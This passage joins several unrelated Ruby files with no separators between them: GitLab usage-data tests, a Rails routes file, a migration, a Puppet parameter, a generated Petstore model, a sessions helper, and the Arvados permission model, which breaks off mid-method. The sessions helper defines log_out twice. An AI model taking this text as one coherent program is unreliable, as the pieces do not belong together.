'i_analytics_dev_ops_score' => 123, 'i_analytics_instance_statistics' => 123, 'p_analytics_merge_request' => 123, 'g_analytics_merge_request' => 123, 'analytics_unique_visits_for_any_target' => 543, 'analytics_unique_visits_for_any_target_monthly' => 987 } }) end end describe '.compliance_unique_visits_data' do subject { described_class.compliance_unique_visits_data } before do allow_next_instance_of(::Gitlab::Analytics::UniqueVisits) do |instance| ::Gitlab::Analytics::UniqueVisits.compliance_events.each do |target| allow(instance).to receive(:unique_visits_for).with(targets: target).and_return(123) end allow(instance).to receive(:unique_visits_for).with(targets: :compliance).and_return(543) allow(instance).to receive(:unique_visits_for).with(targets: :compliance, start_date: 4.weeks.ago.to_date, end_date: Date.current).and_return(987) end end it 'returns the number of unique visits to pages with compliance features' do expect(subject).to eq({ compliance_unique_visits: { 'g_compliance_dashboard' => 123, 'g_compliance_audit_events' => 123, 'i_compliance_credential_inventory' => 123, 'i_compliance_audit_events' => 123, 'a_compliance_audit_events_api' => 123, 'compliance_unique_visits_for_any_target' => 543, 'compliance_unique_visits_for_any_target_monthly' => 987 } }) end end describe '.search_unique_visits_data' do subject { described_class.search_unique_visits_data } before do events = ::Gitlab::UsageDataCounters::HLLRedisCounter.events_for_category('search') events.each do |event| allow(::Gitlab::UsageDataCounters::HLLRedisCounter).to receive(:unique_events).with(event_names: event, start_date: 7.days.ago.to_date, end_date: Date.current).and_return(123) end allow(::Gitlab::UsageDataCounters::HLLRedisCounter).to receive(:unique_events).with(event_names: events, start_date: 7.days.ago.to_date, end_date: Date.current).and_return(543) allow(::Gitlab::UsageDataCounters::HLLRedisCounter).to receive(:unique_events).with(event_names: events, start_date: 4.weeks.ago.to_date, end_date: Date.current).and_return(987) end it 'returns the number of unique visits to pages with search features' do expect(subject).to eq({ search_unique_visits: { 'i_search_total' => 123, 'i_search_advanced' => 123, 'i_search_paid' => 123, 'search_unique_visits_for_any_target_weekly' => 543, 'search_unique_visits_for_any_target_monthly' => 987 } }) end end describe 'redis_hll_counters' do subject { described_class.redis_hll_counters } let(:categories) { ::Gitlab::UsageDataCounters::HLLRedisCounter.categories } let(:ineligible_total_categories) do %w[source_code ci_secrets_management incident_management_alerts snippets terraform pipeline_authoring] end it 'has all known_events' do expect(subject).to have_key(:redis_hll_counters) expect(subject[:redis_hll_counters].keys).to match_array(categories) categories.each do |category| keys = ::Gitlab::UsageDataCounters::HLLRedisCounter.events_for_category(category) metrics = keys.map { |key| "#{key}_weekly" } + keys.map { |key| "#{key}_monthly" } if ineligible_total_categories.exclude?(category) metrics.append("#{category}_total_unique_counts_weekly", "#{category}_total_unique_counts_monthly") end expect(subject[:redis_hll_counters][category].keys).to match_array(metrics) end end end describe '.aggregated_metrics_weekly' do subject(:aggregated_metrics_payload) { described_class.aggregated_metrics_weekly } it 'uses ::Gitlab::Usage::Metrics::Aggregates::Aggregate#weekly_data', :aggregate_failures do expect_next_instance_of(::Gitlab::Usage::Metrics::Aggregates::Aggregate) do |instance| expect(instance).to receive(:weekly_data).and_return(global_search_gmau: 123) end expect(aggregated_metrics_payload).to eq(aggregated_metrics: { global_search_gmau: 123 }) end end describe '.aggregated_metrics_monthly' do subject(:aggregated_metrics_payload) { described_class.aggregated_metrics_monthly } it 'uses ::Gitlab::Usage::Metrics::Aggregates::Aggregate#monthly_data', :aggregate_failures do expect_next_instance_of(::Gitlab::Usage::Metrics::Aggregates::Aggregate) do |instance| expect(instance).to receive(:monthly_data).and_return(global_search_gmau: 123) end expect(aggregated_metrics_payload).to eq(aggregated_metrics: { global_search_gmau: 123 }) end end describe '.service_desk_counts' do subject { described_class.send(:service_desk_counts) } let(:project) { create(:project, :service_desk_enabled) } it 'gathers Service Desk data' do create_list(:issue, 2, :confidential, author: User.support_bot, project: project) expect(subject).to eq(service_desk_enabled_projects: 1, service_desk_issues: 2) end end describe '.snowplow_event_counts' do let_it_be(:time_period) { { collector_tstamp: 8.days.ago..1.day.ago } } context 'when self-monitoring project exists' do let_it_be(:project) { create(:project) } before do stub_application_setting(self_monitoring_project: project) end context 'and product_analytics FF is enabled for it' do before do stub_feature_flags(product_analytics_tracking: true) create(:product_analytics_event, project: project, se_category: 'epics', se_action: 'promote') create(:product_analytics_event, project: project, se_category: 'epics', se_action: 'promote', collector_tstamp: 2.days.ago) create(:product_analytics_event, project: project, se_category: 'epics', se_action: 'promote', collector_tstamp: 9.days.ago) create(:product_analytics_event, project: project, se_category: 'foo', se_action: 'bar', collector_tstamp: 2.days.ago) end it 'returns promoted_issues for the time period' do expect(described_class.snowplow_event_counts(time_period)[:promoted_issues]).to eq(1) end end context 'and product_analytics FF is disabled' do before do stub_feature_flags(product_analytics_tracking: false) end it 'returns an empty hash' do expect(described_class.snowplow_event_counts(time_period)).to eq({}) end end end context 'when self-monitoring project does not exist' do it 'returns an empty hash' do expect(described_class.snowplow_event_counts(time_period)).to eq({}) end end end end
Rails.application.routes.draw do if Settings.homepage.external_url root to: redirect(Settings.homepage.external_url) else root 'home#index' end get 'checklist' => 'home#checklist' get 'terms_and_conditions' => 'home#terms_and_conditions' get 'accessibility-statement' => 'home#accessibility_statement' get 'privacy-policy' => 'home#privacy_policy' get 'cookies' => 'home#cookies' put :cookies, to: 'home#update', as: :set_cookie_preference resources :questions, only: [:edit, :update], path_names: { edit: '' } resource :summary, only: :show resource :submission, only: :create resource :confirmation, only: :show do get :done get :refund get :et end resource :session, only: :destroy do get :start post :finish end resource :help_request, only: %i[new create], path: 'ask-for-help' get 'ask-for-help' => 'help_requests#new' get 'ping' => 'health_status/ping#show' get 'healthcheck' => 'health_status/health_check#show' end
# frozen_string_literal: true class RemoveColumnsFromGliders < ActiveRecord::Migration[6.1] def change remove_column :gliders, :favorite_courses_base remove_column :gliders, :favorite_courses_level_3 remove_column :gliders, :favorite_courses_level_6 remove_column :gliders, :favored_courses end end
newparam(:cwd) do desc <<-EOD The default directory from where the scripts will be run. If not specfied, this will be /tmp. EOD end
=begin #OpenAPI Petstore #This spec is mainly for testing Petstore server and contains fake endpoints, models. Please do not use this for any other purpose. Special characters: \" \\ The version of the OpenAPI document: 1.0.0 Generated by: https://openapi-generator.tech OpenAPI Generator version: 5.0.0-beta2 =end require 'date' module Petstore class ArrayTest attr_accessor :array_of_string attr_accessor :array_array_of_integer attr_accessor :array_array_of_model # Attribute mapping from ruby-style variable name to JSON key. def self.attribute_map { :'array_of_string' => :'array_of_string', :'array_array_of_integer' => :'array_array_of_integer', :'array_array_of_model' => :'array_array_of_model' } end # Attribute type mapping. def self.openapi_types { :'array_of_string' => :'Array<String>', :'array_array_of_integer' => :'Array<Array<Integer>>', :'array_array_of_model' => :'Array<Array<ReadOnlyFirst>>' } end # List of attributes with nullable: true def self.openapi_nullable Set.new([ ]) end # Initializes the object # @param [Hash] attributes Model attributes in the form of hash def initialize(attributes = {}) if (!attributes.is_a?(Hash)) fail ArgumentError, "The input argument (attributes) must be a hash in `Petstore::ArrayTest` initialize method" end # check to see if the attribute exists and convert string to symbol for hash key attributes = attributes.each_with_object({}) { |(k, v), h| if (!self.class.attribute_map.key?(k.to_sym)) fail ArgumentError, "`#{k}` is not a valid attribute in `Petstore::ArrayTest`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect end h[k.to_sym] = v } if attributes.key?(:'array_of_string') if (value = attributes[:'array_of_string']).is_a?(Array) self.array_of_string = value end end if attributes.key?(:'array_array_of_integer') if (value = attributes[:'array_array_of_integer']).is_a?(Array) self.array_array_of_integer = value end end if attributes.key?(:'array_array_of_model') if (value = attributes[:'array_array_of_model']).is_a?(Array) self.array_array_of_model = value end end end # Show invalid properties with the reasons. Usually used together with valid? # @return Array for valid properties with the reasons def list_invalid_properties invalid_properties = Array.new invalid_properties end # Check to see if the all the properties in the model are valid # @return true if the model is valid def valid? true end # Checks equality by comparing each attribute. # @param [Object] Object to be compared def ==(o) return true if self.equal?(o) self.class == o.class && array_of_string == o.array_of_string && array_array_of_integer == o.array_array_of_integer && array_array_of_model == o.array_array_of_model end # @see the `==` method # @param [Object] Object to be compared def eql?(o) self == o end # Calculates hash code according to all attributes. # @return [Integer] Hash code def hash [array_of_string, array_array_of_integer, array_array_of_model].hash end # Builds the object from hash # @param [Hash] attributes Model attributes in the form of hash # @return [Object] Returns the model itself def self.build_from_hash(attributes) new.build_from_hash(attributes) end # Builds the object from hash # @param [Hash] attributes Model attributes in the form of hash # @return [Object] Returns the model itself def build_from_hash(attributes) return nil unless attributes.is_a?(Hash) self.class.openapi_types.each_pair do |key, type| if type =~ /\AArray<(.*)>/i # check to ensure the input is an array given that the attribute # is documented as an array but the input is not if attributes[self.class.attribute_map[key]].is_a?(Array) self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) }) end elsif !attributes[self.class.attribute_map[key]].nil? self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]])) elsif attributes[self.class.attribute_map[key]].nil? && self.class.openapi_nullable.include?(key) self.send("#{key}=", nil) end end self end # Deserializes the data based on type # @param string type Data type # @param string value Value to be deserialized # @return [Object] Deserialized data def _deserialize(type, value) case type.to_sym when :DateTime DateTime.parse(value) when :Date Date.parse(value) when :String value.to_s when :Integer value.to_i when :Float value.to_f when :Boolean if value.to_s =~ /\A(true|t|yes|y|1)\z/i true else false end when :Object # generic object (usually a Hash), return directly value when /\AArray<(?<inner_type>.+)>\z/ inner_type = Regexp.last_match[:inner_type] value.map { |v| _deserialize(inner_type, v) } when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/ k_type = Regexp.last_match[:k_type] v_type = Regexp.last_match[:v_type] {}.tap do |hash| value.each do |k, v| hash[_deserialize(k_type, k)] = _deserialize(v_type, v) end end else # model Petstore.const_get(type).build_from_hash(value) end end # Returns the string representation of the object # @return [String] String presentation of the object def to_s to_hash.to_s end # to_body is an alias to to_hash (backward compatibility) # @return [Hash] Returns the object in the form of hash def to_body to_hash end # Returns the object in the form of hash # @return [Hash] Returns the object in the form of hash def to_hash hash = {} self.class.attribute_map.each_pair do |attr, param| value = self.send(attr) if value.nil? is_nullable = self.class.openapi_nullable.include?(attr) next if !is_nullable || (is_nullable && !instance_variable_defined?(:"@#{attr}")) end hash[param] = _to_hash(value) end hash end # Outputs non-array value in the form of hash # For object, use to_hash. Otherwise, just return the value # @param [Object] value Any valid value # @return [Hash] Returns the value in the form of hash def _to_hash(value) if value.is_a?(Array) value.compact.map { |v| _to_hash(v) } elsif value.is_a?(Hash) {}.tap do |hash| value.each { |k, v| hash[k] = _to_hash(v) } end elsif value.respond_to? :to_hash value.to_hash else value end end end end
module SessionsHelper # Logs in the given user. def log_in(user) session[:user_id] = user.id end def remember(user) user.remember cookies.permanent.signed[:user_id] = user.id cookies.permanent[:remember_token] = user.remember_token end # Returns true if the given user is the current user. def current_user?(user) user == current_user end # Returns the user corresponding to the remember token cookie. def current_user if (user_id = session[:user_id]) @current_user ||= User.find_by(id: user_id) elsif (user_id = cookies.signed[:user_id]) user = User.find_by(id: user_id) if user && user.authenticated?(:remember, cookies[:remember_token]) log_in user @current_user = user end end end # Returns true if the user is logged in, false otherwise. def logged_in? !current_user.nil? end # Logs out the current user. def log_out session.delete(:user_id) @current_user = nil end # Forgets a persistent session. def forget(user) user.forget cookies.delete(:user_id) cookies.delete(:remember_token) end # Logs out the current user. def log_out forget(current_user) session.delete(:user_id) @current_user = nil end # Redirects to stored location (or to the default). def redirect_back_or(default) redirect_to(session[:forwarding_url] || default) session.delete(:forwarding_url) end # Stores the URL trying to be accessed. def store_location session[:forwarding_url] = request.original_url if request.get? end end
# Copyright (C) The Arvados Authors. All rights reserved. # # SPDX-License-Identifier: AGPL-3.0 require 'arvados_model_updates' require 'has_uuid' require 'record_filters' require 'serializers' require 'request_error' class ArvadosModel < ApplicationRecord self.abstract_class = true include ArvadosModelUpdates include CurrentApiClient # current_user, current_api_client, etc. include DbCurrentTime extend RecordFilters after_find :schedule_restoring_changes after_initialize :log_start_state before_save :ensure_permission_to_save before_save :ensure_owner_uuid_is_permitted before_save :ensure_ownership_path_leads_to_user before_destroy :ensure_owner_uuid_is_permitted before_destroy :ensure_permission_to_destroy before_create :update_modified_by_fields before_update :maybe_update_modified_by_fields after_create :log_create after_update :log_update after_destroy :log_destroy before_validation :normalize_collection_uuids before_validation :set_default_owner validate :ensure_valid_uuids # Note: This only returns permission links. It does not account for # permissions obtained via user.is_admin or # user.uuid==object.owner_uuid. has_many(:permissions, ->{where(link_class: 'permission')}, foreign_key: :head_uuid, class_name: 'Link', primary_key: :uuid) # If async is true at create or update, permission graph # update is deferred allowing making multiple calls without the performance # penalty. attr_accessor :async_permissions_update # Ignore listed attributes on mass assignments def self.protected_attributes [] end class PermissionDeniedError < RequestError def http_status 403 end end class AlreadyLockedError < RequestError def http_status 422 end end class LockFailedError < RequestError def http_status 422 end end class InvalidStateTransitionError < RequestError def http_status 422 end end class UnauthorizedError < RequestError def http_status 401 end end class UnresolvableContainerError < RequestError def http_status 422 end end def self.kind_class(kind) kind.match(/^arvados\#(.+)$/)[1].classify.safe_constantize rescue nil end def href "#{current_api_base}/#{self.class.to_s.pluralize.underscore}/#{self.uuid}" end def self.permit_attribute_params raw_params # strong_parameters does not provide security: permissions are # implemented with before_save hooks. # # The following permit! is necessary even with # "ActionController::Parameters.permit_all_parameters = true", # because permit_all does not permit nested attributes. raw_params ||= {} if raw_params raw_params = raw_params.to_hash raw_params.delete_if { |k, _| self.protected_attributes.include? k } serialized_attributes.each do |colname, coder| param = raw_params[colname.to_sym] if param.nil? # ok elsif !param.is_a?(coder.object_class) raise ArgumentError.new("#{colname} parameter must be #{coder.object_class}, not #{param.class}") elsif has_nonstring_keys?(param) raise ArgumentError.new("#{colname} parameter cannot have non-string hash keys") end end # Check JSONB columns that aren't listed on serialized_attributes columns.select{|c| c.type == :jsonb}.collect{|j| j.name}.each do |colname| if serialized_attributes.include? colname || raw_params[colname.to_sym].nil? next end if has_nonstring_keys?(raw_params[colname.to_sym]) raise ArgumentError.new("#{colname} parameter cannot have non-string hash keys") end end end ActionController::Parameters.new(raw_params).permit! end def initialize raw_params={}, *args super(self.class.permit_attribute_params(raw_params), *args) end # Reload "old attributes" for logging, too. def reload(*args) super log_start_state self end def self.create raw_params={}, *args super(permit_attribute_params(raw_params), *args) end def update_attributes raw_params={}, *args super(self.class.permit_attribute_params(raw_params), *args) end def self.selectable_attributes(template=:user) # Return an array of attribute name strings that can be selected # in the given template. api_accessible_attributes(template).map { |attr_spec| attr_spec.first.to_s } end def self.searchable_columns operator textonly_operator = !operator.match(/[<=>]/) self.columns.select do |col| case col.type when :string, :text true when :datetime, :integer, :boolean !textonly_operator else false end end.map(&:name) end def self.attribute_column attr self.columns.select { |col| col.name == attr.to_s }.first end def self.attributes_required_columns # This method returns a hash. Each key is the name of an API attribute, # and it's mapped to a list of database columns that must be fetched # to generate that attribute. # This implementation generates a simple map of attributes to # matching column names. Subclasses can override this method # to specify that method-backed API attributes need to fetch # specific columns from the database. all_columns = columns.map(&:name) api_column_map = Hash.new { |hash, key| hash[key] = [] } methods.grep(/^api_accessible_\w+$/).each do |method_name| next if method_name == :api_accessible_attributes send(method_name).each_pair do |api_attr_name, col_name| col_name = col_name.to_s if all_columns.include?(col_name) api_column_map[api_attr_name.to_s] |= [col_name] end end end api_column_map end def self.ignored_select_attributes ["href", "kind", "etag"] end def self.columns_for_attributes(select_attributes) if select_attributes.empty? raise ArgumentError.new("Attribute selection list cannot be empty") end api_column_map = attributes_required_columns invalid_attrs = [] select_attributes.each do |s| next if ignored_select_attributes.include? s if not s.is_a? String or not api_column_map.include? s invalid_attrs << s end end if not invalid_attrs.empty? raise ArgumentError.new("Invalid attribute(s): #{invalid_attrs.inspect}") end # Given an array of attribute names to select, return an array of column # names that must be fetched from the database to satisfy the request. select_attributes.flat_map { |attr| api_column_map[attr] }.uniq end def self.default_orders ["#{table_name}.modified_at desc", "#{table_name}.uuid"] end def self.unique_columns ["id", "uuid"] end def self.limit_index_columns_read # This method returns a list of column names. # If an index request reads that column from the database, # APIs that return lists will only fetch objects until reaching # max_index_database_read bytes of data from those columns. [] end # If current user can manage the object, return an array of uuids of # users and groups that have permission to write the object. The # first two elements are always [self.owner_uuid, current user's # uuid]. # # If current user can write but not manage the object, return # [self.owner_uuid, current user's uuid]. # # If current user cannot write this object, just return # [self.owner_uuid]. def writable_by return [owner_uuid] if not current_user unless (owner_uuid == current_user.uuid or current_user.is_admin or (current_user.groups_i_can(:manage) & [uuid, owner_uuid]).any?) if ((current_user.groups_i_can(:write) + [current_user.uuid]) & [uuid, owner_uuid]).any? return [owner_uuid, current_user.uuid] else return [owner_uuid] end end [owner_uuid, current_user.uuid] + permissions.collect do |p| if ['can_write', 'can_manage'].index p.name p.tail_uuid end end.compact.uniq end # Return a query with read permissions restricted to the union of the # permissions of the members of users_list, i.e. if something is readable by # any user in users_list, it will be readable in the query returned by this # function. def self.readable_by(*users_list) # Get rid of troublesome nils users_list.compact! # Load optional keyword arguments, if they exist. if users_list.last.is_a? Hash kwargs = users_list.pop else kwargs = {} end # Collect the UUIDs of the authorized users. sql_table = kwargs.fetch(:table_name, table_name) include_trash = kwargs.fetch(:include_trash, false) include_old_versions = kwargs.fetch(:include_old_versions, false) sql_conds = nil user_uuids = users_list.map { |u| u.uuid } all_user_uuids = [] # For details on how the trashed_groups table is constructed, see # see db/migrate/20200501150153_permission_table.rb exclude_trashed_records = "" if !include_trash and (sql_table == "groups" or sql_table == "collections") then # Only include records that are not trashed exclude_trashed_records = "AND (#{sql_table}.trash_at is NULL or #{sql_table}.trash_at > statement_timestamp())" end trashed_check = "" if !include_trash && sql_table != "api_client_authorizations" trashed_check = "#{sql_table}.owner_uuid NOT IN (SELECT group_uuid FROM #{TRASHED_GROUPS} " + "where trash_at <= statement_timestamp()) #{exclude_trashed_records}" end if users_list.select { |u| u.is_admin }.any? # Admin skips most permission checks, but still want to filter on trashed items. if !include_trash && sql_table != "api_client_authorizations" # Only include records where the owner is not trashed sql_conds = trashed_check end else # The core of the permission check is a join against the # materialized_permissions table to determine if the user has at # least read permission to either the object itself or its # direct owner (if traverse_owned is true). See # db/migrate/20200501150153_permission_table.rb for details on # how the permissions are computed. # A user can have can_manage access to another user, this grants # full access to all that user's stuff. To implement that we # need to include those other users in the permission query. # This was previously implemented by embedding the subquery # directly into the query, but it was discovered later that this # causes the Postgres query planner to do silly things because # the query heuristics assumed the subquery would have a lot # more rows that it does, and choose a bad merge strategy. By # doing the query here and embedding the result as a constant, # Postgres also knows exactly how many items there are and can # choose the right query strategy. # # (note: you could also do this with a temporary table, but that # would require all every request be wrapped in a transaction, # which is not currently the case). all_user_uuids = ActiveRecord::Base.connection.exec_query %{ #{USER_UUIDS_SUBQUERY_TEMPLATE % {user: "'#{user_uuids.join "', '"}'", perm_level: 1}} }, 'readable_by.user_uuids' user_uuids_subquery = ":user_uuids" # Note: it is possible to combine the direct_check and # owner_check into a single IN (SELECT) clause, however it turns # out query optimizer doesn't like it and forces a sequential # table scan. Constructing the query with separate IN (SELECT) # clauses enables it to use the index. # # see issue 13208 for details. # Match a direct read permission link from the user to the record uuid direct_check = "#{sql_table}.uuid IN (SELECT target_uuid FROM #{PERMISSION_VIEW} "+ "WHERE user_uuid IN (#{user_uuids_subquery}) AND perm_level >= 1)" # Match a read permission for the user to the record's # owner_uuid. This is so we can have a permissions table that # mostly consists of users and groups (projects are a type of # group) and not have to compute and list user permission to # every single object in the system. # # Don't do this for API keys (special behavior) or groups # (already covered by direct_check). # # The traverse_owned flag indicates whether the permission to # read an object also implies transitive permission to read # things the object owns. The situation where this is important # are determining if we can read an object owned by another # user. This makes it possible to have permission to read the # user record without granting permission to read things the # other user owns. owner_check = "" if sql_table != "api_client_authorizations" and sql_table != "groups" then owner_check = "#{sql_table}.owner_uuid IN (SELECT target_uuid FROM #{PERMISSION_VIEW} "+ "WHERE user_uuid IN (#{user_uuids_subquery}) AND perm_level >= 1 AND traverse_owned) " # We want to do owner_check before direct_check in the OR # clause. The order of the OR clause isn't supposed to # matter, but in practice, it does -- apparently in the # absence of other hints, it uses the ordering from the query. # For certain types of queries (like filtering on owner_uuid), # every item will match the owner_check clause, so then # Postgres will optimize out the direct_check entirely. direct_check = " OR " + direct_check end if Rails.configuration.Users.RoleGroupsVisibleToAll && sql_table == "groups" && users_list.select { |u| u.is_active }.any? # All role groups are readable (but we still need the other # direct_check clauses to handle non-role groups). direct_check += " OR #{sql_table}.group_class = 'role'" end links_cond = "" if sql_table == "links" # 1) Match permission links incoming or outgoing on the # user, i.e. granting permission on the user, or granting # permission to the user. # # 2) Match permission links which grant permission on an # object that this user can_manage. # links_cond = "OR (#{sql_table}.link_class IN (:permission_link_classes) AND "+ " ((#{sql_table}.head_uuid IN (#{user_uuids_subquery}) OR #{sql_table}.tail_uuid IN (#{user_uuids_subquery})) OR " + " #{sql_table}.head_uuid IN (SELECT target_uuid FROM #{PERMISSION_VIEW} "+ " WHERE user_uuid IN (#{user_uuids_subquery}) AND perm_level >= 3))) " end sql_conds = "(#{owner_check} #{direct_check} #{links_cond}) #{trashed_check.empty? ? "" : "AND"} #{trashed_check}" end if !include_old_versions && sql_table == "collections" exclude_old_versions = "#{sql_table}.uuid = #{sql_table}.current_version_uuid" if sql_conds.nil? sql_conds = exclude_old_versions else sql_conds += " AND #{exclude_old_versions}" end end self.where(sql_conds, user_uuids: all_user_uuids.collect{|c| c["target_uuid"]}, permission_link_classes: ['permission']) end def save_with_unique_name! uuid_was = uuid name_was = name max_retries = 2 transaction do conn = ActiveRecord::Base.connection conn.exec_query 'SAVEPOINT save_with_unique_name' begin save! rescue ActiveRecord::RecordNotUnique => rn raise if max_retries == 0 max_retries -= 1 conn.exec_query 'ROLLBACK TO SAVEPOINT save_with_unique_name' # Dig into the error to determine if it is specifically calling out a # (owner_uuid, name) uniqueness violation. In this specific case, and # the client requested a unique name with ensure_unique_name==true, # update the name field and try to save again. Loop as necessary to # discover a unique name. It is necessary to handle name choosing at # this level (as opposed to the client) to ensure that record creation # never fails due to a race condition. err = rn.cause raise unless err.is_a?(PG::UniqueViolation) # Unfortunately ActiveRecord doesn't abstract out any of the # necessary information to figure out if this the error is actually # the specific case where we want to apply the ensure_unique_name # behavior, so the following code is specialized to Postgres. detail = err.result.error_field(PG::Result::PG_DIAG_MESSAGE_DETAIL) raise unless /^Key \(owner_uuid, name\)=\([a-z0-9]{5}-[a-z0-9]{5}-[a-z0-9]{15}, .*?\) already exists\./.match detail new_name = "#{name_was} (#{db_current_time.utc.iso8601(3)})" if new_name == name # If the database is fast enough to do two attempts in the # same millisecond, we need to wait to ensure we try a # different timestamp on each attempt. sleep 0.002 new_name = "#{name_was} (#{db_current_time.utc.iso8601(3)})" end self[:name] = new_name if uuid_was.nil? && !uuid.nil? self[:uuid] = nil if self.is_a? Collection # Reset so that is assigned to the new UUID self[:current_version_uuid] = nil end end conn.exec_query 'SAVEPOINT save_with_unique_name' retry ensure conn.exec_query 'RELEASE SAVEPOINT save_with_unique_name' end end end def user_owner_uuid if self.owner_uuid.nil? return current_user.uuid end owner_class = ArvadosModel.resource_class_for_uuid(self.owner_uuid) if owner_class == User self.owner_uuid else owner_class.find_by_uuid(self.owner_uuid).user_owner_uuid end end def logged_attributes attributes.except(*Rails.configuration.AuditLogs.UnloggedAttributes.stringify_keys.keys) end def self.full_text_searchable_columns self.columns.select do |col| [:string, :text, :jsonb].include?(col.type) end.map(&:name) end def self.full_text_coalesce full_text_searchable_columns.collect do |column| is_jsonb = self.columns.select{|x|x.name == column}[0].type == :jsonb cast = (is_jsonb || serialized_attributes[column]) ? '::text' : '' "coalesce(#{column}#{cast},'')" end end def self.full_text_trgm "(#{full_text_coalesce.join(" || ' ' || ")})" end def self.full_text_tsvector parts = full_text_searchable_columns.collect do |column| is_jsonb = self.columns.select{|x|x.name == column}[0].type == :jsonb cast = (is_jsonb || serialized_attributes[column]) ? '::text' : '' "coalesce(#{column}#{cast},'')" end "to_tsvector('english', substr(#{parts.join(" || ' ' || ")}, 0, 8000))" end def self.apply_filters query, filters ft = record_filters filters, self if not ft[:cond_out].any? return query end ft[:joins].each do |t| query = query.joins(t) end query.where('(' + ft[:cond_out].join(') AND (') + ')', *ft[:param_out]) end protected def self.deep_sort_hash(x) if x.is_a? Hash x.sort.collect do |k, v| [k, deep_sort_hash(v)] end.to_h elsif x.is_a? Array x.collect { |v| deep_sort_hash(v) } else x end end def ensure_ownership_path_leads_to_user if new_record? or owner_uuid_changed? uuid_in_path = {owner_uuid => true, uuid => true} x = owner_uuid while (owner_class = ArvadosModel::resource_class_for_uuid(x)) != User begin if x == uuid # Test for cycles with the new version, not the DB contents x = owner_uuid elsif !owner_class.respond_to? :find_by_uuid raise ActiveRecord::RecordNotFound.new else x = owner_class.find_by_uuid(x).owner_uuid end rescue ActiveRecord::RecordNotFound => e errors.add :owner_uuid, "is not owned by any user: #{e}" throw(:abort) end if uuid_in_path[x] if x == owner_uuid errors.add :owner_uuid, "would create an ownership cycle" else errors.add :owner_uuid, "has an ownership cycle" end throw(:abort) end uuid_in_path[x] = true end end true end def set_default_owner if new_record? and current_user and respond_to? :owner_uuid= self.owner_uuid ||= current_user.uuid end end def ensure_owner_uuid_is_permitted raise PermissionDeniedError if !current_user if self.owner_uuid.nil? errors.add :owner_uuid, "cannot be nil" raise PermissionDeniedError end rsc_class = ArvadosModel::resource_class_for_uuid owner_uuid unless rsc_class == User or rsc_class == Group errors.add :owner_uuid, "must be set to User or Group" raise PermissionDeniedError end if new_record? || owner_uuid_changed? # Permission on owner_uuid_was is needed to move an existing # object away from its previous owner (which implies permission # to modify this object itself, so we don't need to check that # separately). Permission on the new owner_uuid is also needed. [['old', owner_uuid_was], ['new', owner_uuid] ].each do |which, check_uuid| if check_uuid.nil? # old_owner_uuid is nil? New record, no need to check. elsif !current_user.can?(write: check_uuid) logger.warn "User #{current_user.uuid} tried to set ownership of #{self.class.to_s} #{self.uuid} but does not have permission to write #{which} owner_uuid #{check_uuid}" errors.add :owner_uuid, "cannot be set or changed without write permission on #{which} owner" raise PermissionDeniedError elsif rsc_class == Group && Group.find_by_uuid(owner_uuid).group_class != "project" errors.add :owner_uuid, "must be a project" raise PermissionDeniedError end end else # If the object already existed and we're not changing # owner_uuid, we only need write permission on the object # itself. if !current_user.can?(write: self.uuid) logger.warn "User #{current_user.uuid} tried to modify #{self.class.to_s} #{self.uuid} without write permission" errors.add :uuid, " #{uuid} is not writable by #{current_user.uuid}" raise PermissionDeniedError end end true end def ensure_permission_to_save unless (new_record? ? permission_to_create : permission_to_update) raise PermissionDeniedError end end def permission_to_create current_user.andand.is_active end def permission_to_update if !current_user logger.warn "Anonymous user tried to update #{self.class.to_s} #{self.uuid_was}" return false end if !current_user.is_active logger.warn "Inactive user #{current_user.uuid} tried to update #{self.class.to_s} #{self.uuid_was}" return false end return true if current_user.is_admin if self.uuid_changed? logger.warn "User #{current_user.uuid} tried to change uuid of #{self.class.to_s} #{self.uuid_was} to #{self.uuid}" return false end return true end def ensure_permission_to_destroy raise PermissionDeniedError unless permission_to_destroy end def permission_to_destroy if [system_user_uuid, system_group_uuid, anonymous_group_uuid, anonymous_user_uuid, public_project_uuid].include? uuid false else permission_to_update end end def maybe_update_modified_by_fields update_modified_by_fields if self.changed? or self.new_record? true end def update_modified_by_fields current_time = db_current_time self.created_at ||= created_at_was || current_time self.updated_at = current_time self.owner_uuid ||= current_default_owner if self.respond_to? :owner_uuid= if !anonymous_updater self.modified_by_user_uuid = current_user ? current_user.uuid : nil end if !timeless_updater self.modified_at = current_time end self.modified_by_client_uuid = current_api_client ? current_api_client.uuid : nil true end def self.has_nonstring_keys? x if x.is_a? Hash x.each do |k,v| return true if !(k.is_a?(String) || k.is_a?(Symbol)) || has_nonstring_keys?(v) end elsif x.is_a? Array x.each do |v| return true if has_nonstring_keys?(v) end end false end def self.where_serialized(colname, value, md5: false, multivalue: false) colsql = colname.to_s if md5 colsql = "md5(#{colsql})" end if value.empty? # rails4 stores as null, rails3 stored as serialized [] or {} sql = "#{colsql} is null or #{colsql} IN (?)" sorted = value else sql = "#{colsql} IN (?)" sorted = deep_sort_hash(value) end params = [] if multivalue sorted.each do |v| params << v.to_yaml params << SafeJSON.dump(v) end else params << sorted.to_yaml params << SafeJSON.dump(sorted) end if md5 params = params.map { |x| Digest::MD5.hexdigest(x) } end where(sql, params) end Serializer = { Hash => HashSerializer, Array => ArraySerializer, } def self.serialize(colname, type) coder = Serializer[type] @serialized_attributes ||= {} @serialized_attributes[colname.to_s] = coder super(colname, coder) end def self.serialized_attributes @serialized_attributes ||= {} end def serialized_attributes self.class.serialized_attributes end def foreign_key_attributes attributes.keys.select { |a| a.match(/_uuid$/) } end def skip_uuid_read_permission_check %w(modified_by_client_uuid) end def skip_uuid_existence_check [] end def normalize_collection_uuids foreign_key_attributes.each do |attr| attr_value = send attr if attr_value.is_a? String and attr_value.match(/^[0-9a-f]{32,}(\+[@\w]+)*$/) begin send "#{attr}=", Collection.normalize_uuid(attr_value) rescue # TODO: abort instead of silently accepting unnormalizable value? end end end end @@prefixes_hash = nil def self.uuid_prefixes unless @@prefixes_hash @@prefixes_hash = {} Rails.application.eager_load! ActiveRecord::Base.descendants.reject(&:abstract_class?).each do |k| if k.respond_to?(:uuid_prefix) @@prefixes_hash[k.uuid_prefix] = k end end end @@prefixes_hash end def self.uuid_like_pattern "#{Rails.configuration.ClusterID}-#{uuid_prefix}-_______________" end def self.uuid_regex %r/[a-z0-9]{5}-#{uuid_prefix}-[a-z0-9]{15}/ end def check_readable_uuid attr, attr_value return if attr_value.nil? if (r = ArvadosModel::resource_class_for_uuid attr_value) unless 